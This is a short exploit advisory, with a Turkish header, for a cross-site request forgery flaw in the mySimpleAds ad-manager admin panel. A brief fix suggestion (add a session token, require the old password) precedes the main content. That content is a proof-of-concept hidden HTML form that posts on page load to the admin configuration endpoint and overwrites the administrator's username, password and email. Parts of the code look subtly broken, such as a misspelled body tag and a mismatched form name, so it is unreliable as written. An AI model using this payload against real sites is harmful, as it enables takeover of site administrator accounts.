< ------------------- header data start ------------------- >

#############################################################

# Application Name : mySimpleAds

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/BizaRRo

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form class=wufoo name=ads
action=http://www.SITE.net/[PATCH]/admin/index.php?a=config_edit_save method=POST>

<input class=field text medium type=hidden maxlength=255 value=addadd name=config_admin_uname />
<input class=field text medium type=hidden maxlength=255 value=addadd name=config_admin_pass />
<input class=field text medium type=hidden maxlength=255 value=addadd name=config_admin_pass_confirm />
<input class=field text medium type=hidden maxlength=255 value=[email protected] name=config_admin_email />

<input type=submit name=save value=Save />

< -- bug code end of -- >